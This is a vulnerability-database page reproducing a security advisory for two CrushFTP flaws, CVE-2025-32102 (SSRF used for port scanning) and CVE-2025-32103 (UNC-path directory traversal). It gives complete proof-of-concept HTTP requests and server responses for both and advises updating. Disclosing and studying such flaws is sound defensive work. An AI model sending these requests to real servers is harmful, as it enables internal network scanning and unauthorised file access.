Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 CrushFTP 9.x / 10.8.4 / 11.3.1 Server-Side Request Forgery / Directory Traversal

🗓️ 14 Apr 2025 00:00:00Reported by Rafael PedreroType 
packetstorm
 packetstorm🔗 packetstorm.news👁 384 Views

Server-Side Request Forgery and Directory Traversal in CrushFTP versions 9.x to 11.3.1 detected.

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2025-32102
13 Apr 202518:31
circl
Circl		CVE-2025-32103
13 Apr 202518:31
circl
CNNVD		CrushFTP 安全漏洞
15 Apr 202500:00
cnnvd
CNNVD		CrushFTP 安全漏洞
15 Apr 202500:00
cnnvd
CVE		CVE-2025-32102
15 Apr 202500:00
cve
CVE		CVE-2025-32103
15 Apr 202500:00
cve
Cvelist		CVE-2025-32102
15 Apr 202500:00
cvelist
Cvelist		CVE-2025-32103
15 Apr 202500:00
cvelist
EUVD		EUVD-2025-10974
3 Oct 202520:07
euvd
EUVD		EUVD-2025-10978
3 Oct 202520:07
euvd
Rows per page
<!--
    # Exploit Title: Server-Side Request Forgery (SSRF) in CrushFTP 10.7.1 and
    11.1.0 (as well as legacy 9.x)
    # Date: 2024-10-20
    # Exploit Author: Rafael Pedrero
    # Vendor Homepage: https://www.crushftp.com/
    # Software Link: https://www.crushftp.com/download/
    # Version: CrushFTP 9.x and 10.x through 10.8.4 and 11.x through 11.3.1
    # Tested on: all
    # CVE : CVE-2025-32102
    # Vulnerability: CWE-918
    # Category: webapps
    
    1. Description
    
    CrushFTP 9.x and 10.x through 10.8.4 and 11.x through 11.3.1 allows SSRF
    via the host and port parameters in a command=telnetSocket request to the
    /WebInterface/function/ URI.
    
    2. Proof of Concept
    
    The application has a form to establish telnet connections. The parameters
    where the target is entered are host and port, for example,
    "host=127.0.0.1&port=8080". It can be used to scan remote ports, as it
    receives the string "Connected" if it connects successfully, whereas it
    receives "Connection%20refused" if it does not connect
    
    POST http://127.0.0.1:9090/WebInterface/function/ HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0)
    Gecko/20100101 Firefox/115.0
    Accept: */*
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 101
    Origin: http://127.0.0.1:9090
    Connection: keep-alive
    Referer: http://127.0.0.1:9090/WebInterface/admin/telnet.html
    Cookie: CrushAuth=1729605510796_1Zx7MxaDU90dcHQHzIRihmd4peCaVq;
    currentAuth=CaVq
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    Host: 127.0.0.1:9090
    
    command=telnetSocket&sub_command=connect&host=127.0.0.1&port=8080&random=0.17159638175272862&c2f=CaVq
    
    Open port: 8080
    <commandResult><response><id>PeT</id><data>Connected (/127.0.0.1)
    </data></response></commandResult>
    
    Close port: 8888
    <commandResult><response><error>ERROR:java.net.ConnectException%3A%20Connection%20refused%3A%20getsockopt:
    (/127.0.0.1)</error>Error:java.lang.NullPointerException
    </response></commandResult>
    
    
    3. Solution:
    
    Update to last version this product.
    
    -->
    <!--
    # Exploit Title: Directory Traversal in CrushFTP 10.7.1 and 11.1.0 (as well
    as legacy 9.x)
    # Date: 2024-10-20
    # Exploit Author: Rafael Pedrero
    # Vendor Homepage: https://www.crushftp.com/
    # Software Link: https://www.crushftp.com/download/
    # Version: CrushFTP 9.x and 10.x through 10.8.4 and 11.x through 11.3.1
    # Tested on: all
    # CVE : CVE-2025-32103
    # Vulnerability: CWE-40
    # Category: webapps
    
    1. Description
    
    CrushFTP 9.x and 10.x through 10.8.4 and 11.x through 11.3.1 allows
    directory traversal via the /WebInterface/function/ URI to read files
    accessible by SMB at UNC share pathnames, bypassing SecurityManager
    restrictions.
    
    2. Proof of Concept
    
    The application's logic does not account for the fact that, when listing
    directories or files, the path can be modified to allow UNC paths from
    another machine on the network or on the internet instead of local files.
    An attacker injects a UNC path (\server\resource) instead of a local path
    (such as C:/PATH) and gains access to remote directories or files. This is
    more specific than typical Path Traversal and occurs when network paths are
    not properly filtered or restricted.
    
    POST http://127.0.0.1:9090/WebInterface/function/ HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0)
    Gecko/20100101 Firefox/115.0
    Accept: */*
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 113
    Origin: http://127.0.0.1:9090
    Connection: keep-alive
    Referer: http://127.0.0.1:9090/WebInterface/Preferences/index.html
    Cookie: CrushAuth=1729605510796_1Zx7MxaDU90dcHQHzIRihmd4peCaVq;
    currentAuth=CaVq
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    Host: 127.0.0.1:9090
    
    command=getAdminXMLListing&file_mode=server&format=JSON&path=\\\\vboxsrv\\demo&random=0.7936410212028374&c2f=CaVq
    
    <?xml version="1.0" encoding="UTF-8"?>
    <listingInfo type="properties">
    <path>////vboxsrv/demo/</path>
    <privs>(read)(view)</privs>
    <listing>l = new Array();
    lp = {};
    lp.name="directorio1";
    lp.type="DIR";
    lp.root_dir="//vboxsrv/demo/";
    lp.href_path="////vboxsrv/demo/directorio1";
    lp.privs="(read)(view)";
    lp.size="0";
    lp.modified="0";
    lp.created="null";
    l[l.length] = lp;
    lp = {};
    lp.name="directorio2";
    lp.type="DIR";
    lp.root_dir="//vboxsrv/demo/";
    lp.href_path="////vboxsrv/demo/directorio2";
    ...
    
    
    The vulnerable parameter is path, where the local path can be changed to a
    remote path, thereby displaying remote directories. This could later be
    used for potential file downloads within those directories, just as it
    would if they were local.
    
    
    3. Solution:
    
    Update to last version this product.
    
    -->

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
14 Apr 2025 00:00Current
7High risk
Vulners AI Score7
CVSS 3.15
EPSS0.01409
SSVC
server side request forgerycrushftpdirectory traversalweb applicationvulnerabilityremote port scanning.
384